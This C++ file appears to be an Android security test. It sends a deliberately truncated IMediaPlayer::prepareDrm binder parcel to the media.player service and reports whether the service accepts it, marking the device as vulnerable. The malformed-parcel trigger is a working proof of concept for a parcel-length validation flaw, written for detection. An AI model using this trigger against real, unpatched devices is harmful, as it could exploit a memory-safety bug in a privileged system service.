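/**
 * Copyright (C) 2022 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// NOTE(review): the two angle-bracket system includes were lost when this page
// was extracted (only the bare `#include` tokens survived). The headers below
// are the ones that declare the names used in main(); confirm against the
// original file.
#include <media/IMediaPlayerService.h>
#include <media/mediaplayer.h>

#include "../includes/common.h"

using namespace android;

// Proof-of-concept for the IMediaPlayer::prepareDrm binder transaction.
//
// The test sends a prepareDrm transaction whose payload declares a
// `bufferSize`-byte DRM session id but actually carries only `partialWrite`
// bytes (8 after Parcel's 4-byte padding). A hardened server must reject the
// truncated parcel; if the transaction instead returns OK, the server consumed
// the declared length without verifying that many bytes were present, and the
// test reports EXIT_VULNERABLE.
//
// Returns EXIT_VULNERABLE if the malformed transaction is accepted and
// EXIT_SUCCESS if it is rejected. FAIL_CHECK aborts the test on any setup
// failure so a broken environment is never reported as "not vulnerable".
int main() {
    // Size of the leading fixed-size blob and of the session id the payload
    // claims to carry. (Presumably the 16-byte DRM scheme UUID prepareDrm
    // takes first -- the original does not say; verify against IMediaPlayer.)
    constexpr size_t bufferSize = 16;
    // Transaction code of IMediaPlayer::prepareDrm on the affected build.
    constexpr uint32_t prepareDrm = 39;
    // A code past prepareDrm that the interface is not expected to implement;
    // used below to sanity-check that the transaction numbering is what we
    // assume. NOTE(review): why +5 rather than +1 is not documented upstream.
    constexpr uint32_t unknownTrxnCode = prepareDrm + 5;
    // Number of session-id bytes actually written. Parcel pads every write to
    // a 4-byte boundary, so anything >= bufferSize - 3 would be padded up to
    // the full bufferSize and the parcel would no longer be truncated.
    constexpr size_t partialWrite = 7;
    static_assert(bufferSize % 4 == 0, "bufferSize must be Parcel-aligned");
    static_assert(((partialWrite + 3) & ~size_t{3}) < bufferSize,
                  "partial write would be padded up to the full buffer");

    sp<IServiceManager> serviceManager = defaultServiceManager();
    FAIL_CHECK(serviceManager != nullptr);

    sp<IBinder> mediaPlayerService = serviceManager->getService(String16("media.player"));
    FAIL_CHECK(mediaPlayerService != nullptr);

    sp<IMediaPlayerService> iMediaPlayerService =
            IMediaPlayerService::asInterface(mediaPlayerService);
    FAIL_CHECK(iMediaPlayerService != nullptr);

    sp<MediaPlayer> mediaPlayer = new MediaPlayer();
    FAIL_CHECK(mediaPlayer != nullptr);

    sp<IMediaPlayer> iMediaPlayer = iMediaPlayerService->create(mediaPlayer);
    FAIL_CHECK(iMediaPlayer != nullptr);

    sp<IBinder> binder = IMediaPlayer::asBinder(iMediaPlayer);

    Parcel data, reply;
    FAIL_CHECK(data.writeInterfaceToken(iMediaPlayer->getInterfaceDescriptor()) == OK);

    // Sanity check: a code the interface does not implement must come back as
    // UNKNOWN_TRANSACTION. If this fails, `prepareDrm` is probably not the
    // code we think it is and the test would be aimed at the wrong handler.
    status_t status = binder->transact(unknownTrxnCode, data, &reply);
    FAIL_CHECK(status == UNKNOWN_TRANSACTION);

    // Build the malformed payload on top of the interface token already in
    // `data`: a full bufferSize-byte blob, a claimed session-id length of
    // bufferSize, then only partialWrite bytes of session id. Every write is
    // checked so a failed write cannot silently change the parcel we send.
    const uint8_t arr[bufferSize] = {};
    FAIL_CHECK(data.write(arr, bufferSize) == OK);
    FAIL_CHECK(data.writeUint32(static_cast<uint32_t>(bufferSize)) == OK);
    FAIL_CHECK(data.write(arr, partialWrite) == OK);

    status = binder->transact(prepareDrm, data, &reply);

    // The server must refuse a parcel shorter than the length it declares.
    // OK means the truncated session id was accepted.
    return status == OK ? EXIT_VULNERABLE : EXIT_SUCCESS;
}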